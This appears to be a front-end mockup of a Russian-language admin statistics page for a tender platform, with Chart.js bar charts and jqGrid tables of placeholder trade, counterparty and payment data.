<!DOCTYPE html>

<html lang="ru-RU">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="assets/css/normalize.css">
    <!-- Главные стили -->
    <!-- <link rel="stylesheet" href="assets/css/style.css"> -->
	<!-- bootstrap -->
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/bootstrap-datetimepicker.min.css">
    <!-- Карусель slick -->
    <link rel="stylesheet" href="assets/css/slick.css">
    <link rel="stylesheet" href="assets/css/slick-theme.css">

   	<!-- admin styles -->
    <link rel="stylesheet" href="assets/css/base.css">
    <link rel="stylesheet" href="assets/css/dashboard.css">
    <link rel="stylesheet" href="assets/css/responsive.css">
    <link rel="stylesheet" href="assets/css/admin-styles.css">

	<!-- font awesome -->
	<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> -->
<!-- 	<script src="https://use.fontawesome.com/b38bf7744d.js"></script>
	<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous"> -->
    <link rel="stylesheet" href="assets/css/fontawesome/all.css">
    <link rel="stylesheet" href="assets/css/fontawesome/svg-with-js.min.css">
    <link rel="stylesheet" href="assets/css/fontawesome/brands.min.css">
    <link rel="stylesheet" href="assets/css/fontawesome/fontawesome.min.css">
    <link rel="stylesheet" href="assets/css/fontawesome/regular.min.css">
    <link rel="stylesheet" href="assets/css/fontawesome/solid.min.css">
    <link rel="stylesheet" href="assets/css/jquery-ui.min.css">
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.9.3/Chart.bundle.min.js"></script>

    <!-- <link rel="stylesheet" type="text/css" media="screen" href="assets/css/flick/jquery-ui.theme.min.css" /> -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.11.4/themes/redmond/jquery-ui.min.css">
    <!-- <link rel="stylesheet" type="text/css" href="themes/redmond/jquery-ui-1.7.1.custom.css" /> -->
	
	
	<!-- стили для jqgrid -->
	<link rel="stylesheet" type="text/css" media="screen" href="assets/css/ui.jqgrid.css" mce_href="css/ui.jqgrid.css" />
	<style>html, body {
	    margin: 0;
	    padding: 0;
	    font-size: 80%;
	}
	</style>
    
<body>
	<!-- Оверлей для мобильного меню, модальных оконо и тд.	 -->
   <div class="screen-shadow"></div> 

<!-- Шапка начало    -->

<!-- Шапка конец -->

<main>
	<section class="admin-statistic">
		<div id="container">
			<div id="header">
				<div id="branding">
					<h1 id="site-name"><a href="/admin/">TENDERFOOD</a></h1>
				</div>
				<div id="user-tools">Добро пожаловать,<strong>Тестов Т.</strong>.
					<a href="/">Открыть сайт</a> /
					<a href="/admin/password_change/">Изменить пароль</a> /
					<a href="/admin/logout/">Выйти</a>
				</div>
			</div>
			<div id="content" class="flex">
				<div id="content-main">
   
					    
					    
					    <div class="module" id="changelist">
						    <ul class="nav nav-tabs admin-tabs">
							  <li ><a class="active" data-toggle="tab" href="#trades">Торги</a></li>
							  <li><a data-toggle="tab" href="#counterparty">Контрагенты</a></li>
							  <li><a data-toggle="tab" href="#payment">Оплаты</a></li>
							</ul>	

						<div class="tab-content">
							  <div id="trades" class="tab-pane fade in active show">
							    <div class="admin__statistic-wrap">
							      	<canvas id="statistic-trades-total" class="admin__statistic-body"></canvas>
							      </div>
							      <div class="admin__statistic-wrap">
							      	<canvas id="statistic-trades-summ" class="admin__statistic-body" ></canvas>
							      </div>
									<!-- Универсальная таблица СЧЕТА и пагинация для нее -->
									<!-- ТАблица сообщения -->
									<!-- Нужно указать уникальний ID для контейнера таблицы, и таблице. 
									ID для контейнера таблицы будет использоваться для поиска текущей страницы
									По ID таблицы инициируется скрипт генерации таблицы. 

									Так же нужно указать ID контейнера родной пагинации таблицы

									Ниже выводится кастомный контейнер пагинации, кнопкам присваиваются такие же ID как и у родных кнопок -->

									<div id="statistic-trades-wrap" class="table-responsive admin-table-wrap"> <!-- Контейнер для таблицы -->
										<table id="statistic-trades-table" class="table"></table> <!-- таблица -->
									<div id="statistic-trades-gridpager"></div> <!-- Контейнер родной пагинации таблицы -->

									</div>
									<div id="statistic-trades-table-paginator" class="my-table-paginator">
										<ul class="pagination-box">
											<li class="pagination-item first">
												<a id="first_statistic-trades-gridpager" href="#">первая...</a>
											</li>
											<li class="pagination-item prev">
												<a id="prev_statistic-trades-gridpager" href="#">1</a>
											</li>
											<li class="pagination-item active">
												<a id="paginator_statistic-trades-current_page" href="#">1</a>
											</li>
											<li class="pagination-item next">
												<a id="next_statistic-trades-gridpager" href="#">3</a>
											</li>
											<li class="pagination-item last">
												<a id="last_statistic-trades-gridpager" href="#">..последняя</a>
											</li>
										</ul>
									</div>	<!-- Универсальная таблица и пагинация для нее -->

							  </div>
							  <div id="counterparty" class="tab-pane fade">
							    <div class="admin__statistic-wrap">
							      	<canvas id="statistic-counterparty" class="admin__statistic-body" ></canvas>
							      </div>

							      <!-- Универсальная таблица СЧЕТА и пагинация для нее -->
									<!-- ТАблица сообщения -->
									<!-- Нужно указать уникальний ID для контейнера таблицы, и таблице. 
									ID для контейнера таблицы будет использоваться для поиска текущей страницы
									По ID таблицы инициируется скрипт генерации таблицы. 

									Так же нужно указать ID контейнера родной пагинации таблицы

									Ниже выводится кастомный контейнер пагинации, кнопкам присваиваются такие же ID как и у родных кнопок -->

									<div id="statistic-counterparty-wrap" class="table-responsive admin-table-wrap"> <!-- Контейнер для таблицы -->
										<table id="statistic-counterparty-table" class="table"></table> <!-- таблица -->
									<div id="statistic-counterparty-gridpager"></div> <!-- Контейнер родной пагинации таблицы -->

									</div>
									<div id="statistic-counterparty-table-paginator" class="my-table-paginator">
										<ul class="pagination-box">
											<li class="pagination-item first">
												<a id="first_statistic-counterparty-gridpager" href="#">первая...</a>
											</li>
											<li class="pagination-item prev">
												<a id="prev_statistic-counterparty-gridpager" href="#">1</a>
											</li>
											<li class="pagination-item active">
												<a id="paginator_statistic-counterparty-current_page" href="#">1</a>
											</li>
											<li class="pagination-item next">
												<a id="next_statistic-counterparty-gridpager" href="#">3</a>
											</li>
											<li class="pagination-item last">
												<a id="last_statistic-counterparty-gridpager" href="#">..последняя</a>
											</li>
										</ul>
									</div>	<!-- Универсальная таблица и пагинация для нее -->
							  </div>
							  <div id="payment" class="tab-pane fade">
							  	<div class="admin__statistic-wrap">
							      	<canvas id="statistic-payment-total" class="admin__statistic-body" ></canvas>
							      	<canvas id="statistic-payment-summ" class="admin__statistic-body" ></canvas>
							      </div>
							    <!-- Универсальная таблица СЧЕТА и пагинация для нее -->
									<!-- ТАблица сообщения -->
									<!-- Нужно указать уникальний ID для контейнера таблицы, и таблице. 
									ID для контейнера таблицы будет использоваться для поиска текущей страницы
									По ID таблицы инициируется скрипт генерации таблицы. 

									Так же нужно указать ID контейнера родной пагинации таблицы

									Ниже выводится кастомный контейнер пагинации, кнопкам присваиваются такие же ID как и у родных кнопок -->

									<div id="statistic-payment-wrap" class="table-responsive admin-table-wrap"> <!-- Контейнер для таблицы -->
										<table id="statistic-payment-table" class="table"></table> <!-- таблица -->
									<div id="statistic-payment-gridpager"></div> <!-- Контейнер родной пагинации таблицы -->

									</div>
									<div id="statistic-payment-table-paginator" class="my-table-paginator">
										<ul class="pagination-box">
											<li class="pagination-item first">
												<a id="first_statistic-payment-gridpager" href="#">первая...</a>
											</li>
											<li class="pagination-item prev">
												<a id="prev_statistic-payment-gridpager" href="#">1</a>
											</li>
											<li class="pagination-item active">
												<a id="paginator_statistic-payment-current_page" href="#">1</a>
											</li>
											<li class="pagination-item next">
												<a id="next_statistic-payment-gridpager" href="#">3</a>
											</li>
											<li class="pagination-item last">
												<a id="last_statistic-payment-gridpager" href="#">..последняя</a>
											</li>
										</ul>
									</div>	<!-- Универсальная таблица и пагинация для нее -->
							  </div>
							</div>

							
					    </div>
					  </div>
			</div>
		</div>
	</section>

	
</main>


<script src="assets/js/jquery-3.4.1.min.js"></script>

<!-- bootstrap -->
<script src="assets/js/bootstrap.min.js"></script>
<!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datetimepicker/4.7.14/js/bootstrap-datetimepicker.min.js"></script> -->

<!-- Карусель slick -->
<script src="assets/js/slick.min.js"></script>

<!-- fontawesome -->
<script src="assets/js/fontawesome/all.js"></script>
<script src="assets/js/fontawesome/brands.min.js"></script>
<!-- <script src="assets/js/fontawesome/conflict-detection.min.js"></script> -->
<script src="assets/js/fontawesome/fontawesome.min.js"></script>
<script src="assets/js/fontawesome/regular.min.js"></script>
<script src="assets/js/fontawesome/solid.min.js"></script>
<script src="assets/js/fontawesome/v4-shims.min.js"></script>

<!-- графический интерфейс jquery -->
<script src="assets/js/jquery-ui.min.js"></script>

<!-- Маска для ввода номера телефона -->
<script src="assets/js/jquery.maskedinput.js"></script>

<!-- Скрипты jqgrid. Нужны для таблицы -->
<script type="text/javascript" src="assets/js/i18n/grid.locale-ru.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/free-jqgrid/4.15.5/jquery.jqgrid.min.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/echarts/4.1.0/echarts-en.min.js"></script>



<script src="https://d3js.org/d3.v5.min.js"></script>


<!-- Основные скрипты -->
<script src="assets/js/main.js"></script>

<script>

$(document).ready(function(){
	
// График ТОРГИ КОЛИЧЕСТВО ТОРГОВ
var ctx_total = document.getElementById('statistic-trades-total');

var trades_total = new Chart(ctx_total, {
    type: 'bar',
    data: {
        labels: ['January', 'February', 'March', 'April', 'May', 'June', 'July'],
        datasets: [{
            label: 'Активные',
            data: [6, 10, 3, 5, 2, 3],
            backgroundColor: 'red',
            borderWidth: 1,

        }, {
        	label: 'Завершенные',
            data: [1, 6, 12, 4, 8, 20],
            backgroundColor: 'orange',
            borderWidth: 1,
        },{
        	label: 'Сделка завершена',
            data: [5, 3, 2, 4, 5, 10],
            backgroundColor: 'aqua',
            borderWidth: 1,
        } ]
    },
    options: {

    	title: {
			display: true,
			text: 'Количество торгов'
		},
        scales: {
        	xAxes: [{
                stacked: true
            }],
            yAxes: [{
                id: 'first-y-axis',
                type: 'linear',
                stacked: true,
            }]
        },
        responsive:true
    }
});

// график ТОРГИ СУММА ТОРГОв
var ctx_summ = document.getElementById('statistic-trades-summ');

var trades_summ = new Chart(ctx_summ, {
    type: 'bar',
    data: {
        labels: ['January', 'February', 'March', 'April', 'May', 'June', 'July'],
        datasets: [{
            label: 'Активные',
            data: [132000, 32000, 256144, 265, 4458896, 3330000],
            backgroundColor: 'red',
            borderWidth: 1,

        }, {
        	label: 'Завершенные',
            data: [1225639, 63655, 120000, 40000, 888940, 200004],
            backgroundColor: 'orange',
            borderWidth: 1,
        },{
        	label: 'Сделка завершена',
            data: [569870, 3411550, 2336650, 4440000, 5999900, 100000],
            backgroundColor: 'aqua',
            borderWidth: 1,
        } ]
    },
    options: {

    	title: {
			display: true,
			text: 'Сумма торгов'
		},
        scales: {
        	xAxes: [{
                stacked: true
            }],
            yAxes: [{
                id: 'first-y-axis',
                type: 'linear',
                stacked: true,
            }]
        },
        responsive:true
    }
});

// График Контрагенты
var ctx_counter = document.getElementById('statistic-counterparty');



var counterparty = new Chart(ctx_counter, {
    type: 'bar',
    data: {
        labels: ['January', 'February', 'March', 'April', 'May', 'June', 'July'],
        datasets: [{
            label: 'Контрагенты',
            data: [132000, 32000, 256144, 265, 4458896, 3330000],
            backgroundColor: 'red',
            borderWidth: 1,
         } ]
    },
    options: {
    	title: {
			display: true,
			text: 'Контрагенты'
		},
        scales: {
        	xAxes: [{
                stacked: true
            }],
            yAxes: [{
                id: 'first-y-axis',
                type: 'linear',
                stacked: true,
            }]
        },
        responsive:true
    }
});



// График ОПЛАТЫ КОЛИЧЕСТВО
var ctx_payment_total = document.getElementById('statistic-payment-total');

var payment_total = new Chart(ctx_payment_total, {

    type: 'bar',
    data: {
        labels: ['January', 'February', 'March', 'April', 'May', 'June', 'July'],
        datasets: [{
            label: 'Оплаты',
            data: [13, 3, 14, 5, 25, 33],
            backgroundColor: 'red',
            borderWidth: 1,
         } ]
    },
    options: {
    	title: {
			display: true,
			text: 'Количество оплат'
		},
        scales: {
        	xAxes: [{
                stacked: true
            }],
            yAxes: [{
                id: 'first-y-axis',
                type: 'linear',
                stacked: true,
            }]
        },
        responsive:true
    }
});



// График ОПЛАТЫ СУММА
var ctx_payment_summ = document.getElementById('statistic-payment-summ');

var payment_summ = new Chart(ctx_payment_summ, {

    type: 'bar',
    data: {
        labels: ['January', 'February', 'March', 'April', 'May', 'June', 'July'],
        datasets: [{
            label: 'Оплаты',
            data: [1255, 3698, 14448, 5200, 2545, 33668],
            backgroundColor: 'red',
            borderWidth: 1,
         } ]
    },
    options: {
    	title: {
			display: true,
			text: 'Сумма оплат'
		},
        scales: {
        	xAxes: [{
                stacked: true
            }],
            yAxes: [{
                id: 'first-y-axis',
                type: 'linear',
                stacked: true,
            }]
        },
        responsive:true
    }
});

})
</script>


  <!-- Генерация таблицы для статистики торгов начало-->
<script type="text/javascript">

$(document).ready(function () {
    "use strict";
    $("#statistic-trades-table").jqGrid({
  //   	url:'get.php',
		// datatype: "json",
		// colNames:['ID', 'country_code', 'city', 'latitude', 'longitude'],
		// colModel:[
		// 	{name:'id',index:'id'},
		// 	{name:'country_code',index:'country_code'},	
		// 	{name:'city',index:'city'},		
		// 	{name:'latitude',index:'latitude'},		
		// 	{name:'longitude',index:'longitude'},		
		// ],
        colModel: [
            { name: 'id', label: "ID Торгов", width: 120, clearSearch: true, autosearch: true, searchOnEnter: false, formatter:'showlink', formatoptions:{baseLinkUrl:'#', addParam: ''}},
            { name: 'counterparty', label: "Контрагент", width: 200, clearSearch: true, autosearch: true, searchOnEnter: false, formatter:'showlink', formatoptions:{baseLinkUrl:'#', addParam: ''}},
            { name: 'date_open', label: "Дата открытия", width: 160, sorttype: 'date', formatter: 'date', formatoptions: { newformat: "d-m-y"},searchOnEnter: true, searchoptions: {sopt: ["eq"]}, clearSearch: true, autosearch: true,},
            { name: 'date_close', label: "Дата завершения", width: 160, sorttype: 'date', formatter: 'date', formatoptions: { newformat: "d-m-y"},searchOnEnter: true, searchoptions: {sopt: ["eq"]}, clearSearch: true, autosearch: true,},
            { name: 'summary', label: "Сумма сделки", width: 150, clearSearch: true, autosearch: true, searchOnEnter: false},
            { name: 'commission', label: "Сумма комиссии", width: 150, clearSearch: true, autosearch: true, searchOnEnter: false},
            { name: 'status', label: "Статус", width: 100, clearSearch: true, autosearch: true, searchOnEnter: false, stype: "select", searchoptions: { value: ":Все;Активные:Активные;Закрытые:Закрытые;Сделка завершена:Сделка завершена" }},
        ],
        data: [
            { id: "123432", counterparty: 'Контрагент1', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '30 грн.', status: 'Активные' },
            { id: "225668", counterparty: 'Контрагент2', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '40 грн.', status: 'Активные' },
            { id: "365", counterparty: 'Контрагент2', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "1896654", counterparty: 'Контрагент2', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '120 грн.', status: 'Активные' },
            { id: "2563", counterparty: 'Контрагент2', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '50 грн.', status: 'Закрытые' },
            { id: "12556", counterparty: 'Контрагент2', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '80 грн.', status: 'Закрытые' },
            { id: "96351", counterparty: 'Контрагент1', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "123432", counterparty: 'Контрагент3', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "225668", counterparty: 'Контрагент2', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "365", counterparty: 'Контрагент2', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "1896654", counterparty: 'Контрагент1', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "2563", counterparty: 'Контрагент23', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "12556", counterparty: 'Контрагент2', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "96351", counterparty: 'Контрагент2', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "123432", counterparty: 'Контрагент3', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '60 грн.', status: 'Сделка завершена' },
            { id: "225668", counterparty: 'Контрагент2', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "365", counterparty: 'Контрагент2', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "1896654", counterparty: 'Контрагент3', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "2563", counterparty: 'Контрагент2', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '90 грн.', status: 'Не оплачен' },
            { id: "12556", counterparty: 'Контрагент1', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "96351", counterparty: 'Контрагент2', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Не оплачен' },
            { id: "123432", counterparty: 'Контрагент3', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '80 грн.', status: 'Активные' },
            { id: "225668", counterparty: 'Контрагент2', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Сделка завершена' },
            { id: "365", counterparty: 'Контрагент2', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "1896654", counterparty: 'Контрагент3', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "2563", counterparty: 'Контрагент2', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "12556", counterparty: 'Контрагент2', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "96351", counterparty: 'Контрагент1', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "123432", counterparty: 'Контрагент3', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '100 грн.', status: 'Закрытые' },
            { id: "225668", counterparty: 'Контрагент2', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "365", counterparty: 'Контрагент2', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "1896654", counterparty: 'Контрагент3', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "2563", counterparty: 'Контрагент2', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '20 грн.', status: 'Закрытые' },
            { id: "12556", counterparty: 'Контрагент2', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "96351", counterparty: 'Контрагент1', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "123432", counterparty: 'Контрагент2', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '30 грн.', status: 'Закрытые' },
            { id: "225668", counterparty: 'Контрагент5', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Не оплачен' },
            { id: "365", counterparty: 'Контрагент1', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.',  commission: '60 грн.',status: 'Оплачен' },
            { id: "1896654", counterparty: 'Контрагент5', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "2563", counterparty: 'Контрагент2', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "12556", counterparty: 'Контрагент2', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "96351", counterparty: 'Контрагент1', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "123432", counterparty: 'Контрагент6', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "225668", counterparty: 'Контрагент6', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Не оплачен' },
            { id: "365", counterparty: 'Контрагент2', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "1896654", counterparty: 'Контрагент2', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Оплачен' },
            { id: "2563", counterparty: 'Контрагент1', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "12556", counterparty: 'Контрагент2', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "96351", counterparty: 'Контрагент2', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Не оплачен' },
            { id: "123432", counterparty: 'Контрагент1', date_open: '2019-09-19', date_close: '2010-07-19', summary: '60 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "225668", counterparty: 'Контрагент5', date_open: '2018-06-29', date_close: '2016-10-09', summary: '5560 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "365", counterparty: 'Контрагент1', date_open: '2014-12-01', date_close: '2020-08-19', summary: '590 грн.', commission: '250 грн.', status: 'Закрытые' },
            { id: "1896654", counterparty: 'Контрагент4', date_open: '2016-10-09', date_close: '2020-08-19', summary: '1560 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "2563", counterparty: 'Контрагент2', date_open: '2008-01-01', date_close: '2019-09-19', summary: '560 грн.', commission: '60 грн.', status: 'Активные' },
            { id: "12556", counterparty: 'Контрагент1', date_open: '2009-09-09', date_close: '2018-06-29', summary: '960 грн.', commission: '60 грн.', status: 'Закрытые' },
            { id: "96351", counterparty: 'Контрагент4', date_open: '2010-07-19', date_close: '2020-08-19', summary: '9660 грн.', commission: '60 грн.', status: 'Закрытые' },
            

        ],
        searchOnEnter: false,
        autosearch: true,
        guiStyle: 'bootstrap4',
        // iconSet: 'fontAwesome',
        iconSet: 'jQueryUI',
        idPrefix: 'lot_',
        caption: 'Таблица торгов',
        hidegrid: false,
        loadonce: false,
        // pager: true,
        pagermode: "simple",
     	pageable: true,
        pager : '#statistic-trades-gridpager',
        rowNum: '10',
        viewrecords: true,
        ignoreCase: false,
        headertitles: true,
        // multiSort: true,
        height: 330,
        deepempty: true,
   //      jsonReader: {
			// 	repeatitems : false,
			// 	id: "0"
			// },
        // searching: {
        // 	deafaultSearch: 'cn'
        // },
        searching: {
            defaultSearch: "cn"
        },
        searchoptions: {
		    sopt: ["eq"],
		    dataInit: function (elem, options) {
		        var self = this, $elem = $(elem),
		            filterOnSelect = function () {
		                setTimeout(function () {
		                    self.triggerToolbar();
		                }, 50);
		            },
		            triggerInputChangeOnSelect = function () {
		                $elem.change();
		            };
		        
		        setTimeout(function () {
		            $elem.datepicker({
		                dateFormat: "dd-M-yy",
		                autoSize: true,
		                changeYear: true,
		                changeMonth: true,
		                showButtonPanel: true,
		                showWeek: true,
		                onSelect: (options.mode === "filter" ? filterOnSelect : triggerInputChangeOnSelect)
		            });
		        }, 50);
		    },
		    searchOnEnter: false,

		},

    }).jqGrid('filterToolbar', {
    	// searchOnEnter: false,
    	autosearch: true,
    	searchOperators: true

    });
	

    $("#statistic-trades-table-paginator .pagination-box a").click(function () {
        var page = Number(this.innerHTML);
        $("#statistic-trades-table").trigger("reloadGrid", { page: page});

       
    });
});


// Пагинация для таблицы
function initPaginatorTrades() {
	var last_page = $('#sp_1_statistic-trades-gridpager').html();
	console.log(last_page)
 	var current_page = $('#statistic-trades-wrap .form-control.ui-pg-input').val();

 	$('#statistic-trades-table-paginator .pagination-item.active a').text(current_page);
	$('#statistic-trades-table-paginator .pagination-item.last a').text('...' + last_page);
	$('#statistic-trades-table-paginator .pagination-item.prev a').text(parseInt(current_page) - 1);
	$('#statistic-trades-table-paginator .pagination-item.next a').text(parseInt(current_page) + 1);



	if (current_page >= last_page) {
		$('#statistic-trades-table-paginator .pagination-item.last').hide();

		$('#statistic-trades-table-paginator .pagination-item.next').hide();

	} else if (current_page < last_page) {
		$('#statistic-trades-table-paginator .pagination-item.last').show();

		$('#statistic-trades-table-paginator .pagination-item.next').show();

	} 
	if ( current_page == '1' ) {

		$('#statistic-trades-table-paginator .pagination-item.prev').hide();

		$('#statistic-trades-table-paginator .pagination-item.first').hide();

	} else if (current_page > '1') {

		$('#statistic-trades-table-paginator .pagination-item.prev').show();

		
	} 

	if (current_page > '2') {

		$('#statistic-trades-table-paginator .pagination-item.first').show();
	} else if ( current_page < '2' ) {
		$('#statistic-trades-table-paginator .pagination-item.first').hide()
	}

}

 $(document).ready(function(){
 	 initPaginatorTrades()
	$('#next_statistic-trades-gridpager, #prev_statistic-trades-gridpager, #first_statistic-trades-gridpager, #last_statistic-trades-gridpager').on('click', function() {
		
		initPaginatorTrades()
	})
 }) 

 $(document).ready(function(){
 	 initPaginatorTrades()
	$('#statistic-trades-wrap select, #statistic-trades-wrap input').on('change', function() {
		console.log('test')
		initPaginatorTrades()
	})
 })

 $(document).ready(function() {
 	$('#gs_statistic-trades-table_date_open, #gs_statistic-trades-table_date_close').datepicker({
 		locale: 'ru',
 		showButtonPanel: true,
 		dateFormat: 'dd-mm-y'

 	})
 })

</script>
<!-- Генерация таблицы конец-->



  <!-- Генерация таблицы для статистики контрагентов начало-->
<script type="text/javascript">

$(document).ready(function () {
    "use strict";
    $("#statistic-counterparty-table").jqGrid({
  //   	url:'get.php',
		// datatype: "json",
		// colNames:['ID', 'country_code', 'city', 'latitude', 'longitude'],
		// colModel:[
		// 	{name:'id',index:'id'},
		// 	{name:'country_code',index:'country_code'},	
		// 	{name:'city',index:'city'},		
		// 	{name:'latitude',index:'latitude'},		
		// 	{name:'longitude',index:'longitude'},		
		// ],
        colModel: [
            { name: 'id', label: "ID Контрагента", width: 120, clearSearch: true, autosearch: true, searchOnEnter: false, formatter:'showlink', formatoptions:{baseLinkUrl:'#', addParam: ''}},
            { name: 'counterparty', label: "Контрагент", width: 200, clearSearch: true, autosearch: true, searchOnEnter: false, formatter:'showlink', formatoptions:{baseLinkUrl:'#', addParam: ''}},
            { name: 'date_start', label: "Дата открытия", width: 160, sorttype: 'date', formatter: 'date', formatoptions: { newformat: "d-m-y"},searchOnEnter: true, searchoptions: {sopt: ["eq"]}, clearSearch: true, autosearch: true,},
            // { name: 'date_close', label: "Дата завершения", width: 160, sorttype: 'date', formatter: 'date', formatoptions: { newformat: "d-m-y"},searchOnEnter: true, searchoptions: {sopt: ["eq"]}, clearSearch: true, autosearch: true,},
            { name: 'summary', label: "Сумма сделки", width: 150, clearSearch: true, autosearch: true, searchOnEnter: false},
            { name: 'commission', label: "Сумма комиссии", width: 150, clearSearch: true, autosearch: true, searchOnEnter: false},
            { name: 'status', label: "Статус", width: 100, clearSearch: true, autosearch: true, searchOnEnter: false, stype: "select", searchoptions: { value: ":Все;Заблокирован:Заблокирован;Разблокирован:Разблокирован" }},
        ],
        data: [
            { id: "123432", counterparty: 'Контрагент1', date_start: '2019-09-19',summary: '60 грн.', commission: '30 грн.', status: 'Заблокирован' },
            { id: "225668", counterparty: 'Контрагент2', date_start: '2018-06-29', summary: '5560 грн.', commission: '40 грн.', status: 'Разблокирован' },
            { id: "365", counterparty: 'Контрагент2', date_start: '2014-12-01', summary: '590 грн.', commission: '60 грн.', status: 'Заблокирован' },
            { id: "1896654", counterparty: 'Контрагент2', date_start: '2016-10-09', summary: '1560 грн.', commission: '120 грн.', status: 'Разблокирован' },
            { id: "2563", counterparty: 'Контрагент2', date_start: '2008-01-01',  summary: '560 грн.', commission: '50 грн.', status: 'Заблокирован' },
            { id: "12556", counterparty: 'Контрагент2', date_start: '2009-09-09', summary: '960 грн.', commission: '80 грн.', status: 'Заблокирован' },
            { id: "96351", counterparty: 'Контрагент1', date_start: '2010-07-19',  summary: '9660 грн.', commission: '60 грн.', status: 'Разблокирован' },
